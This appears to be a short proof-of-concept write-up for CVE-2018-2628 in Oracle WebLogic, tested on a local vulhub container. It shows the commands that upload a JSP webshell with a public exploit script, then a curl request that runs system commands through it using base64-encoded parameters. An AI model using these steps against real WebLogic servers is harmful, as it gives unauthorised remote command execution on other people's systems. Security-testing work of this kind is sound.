WebLogic - CVE-2018-2628

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components).

Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.

PoC

This vulnerability can be exploited using jas502n's script CVE-2018-2628-Getshell.py. A working webshell (to be uploaded) can be found on my git, it is massive and looks weird, but as you see in the picture it will be compiled to a smaller shell.

This is probably an error on my end, but I'm too lazy to investigate at the moment.

Note that the shell is one-time-use only, meaning it will be removed once you execute a command.

## Tested on VulnHubs weblogic:10.3.6.0-2017 container
» docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED       STATUS                 PORTS                                                                                            NAMES
f3b474a990a1   vulhub/weblogic:10.3.6.0-2017                                "startWebLogic.sh"       5 hours ago   Up 5 hours             5556/tcp, 0.0.0.0:7003->7001/tcp, :::7003->7001/tcp, 0.0.0.0:9004->9002/tcp, :::9004->9002/tcp   vuln-weblogic

## Upload shell
» python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp
>>>Shell File Upload Dir:  servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp
>>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==

## Execute command ('hostname' in this case)
» curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\=
->|vuln-weblogic
|<-%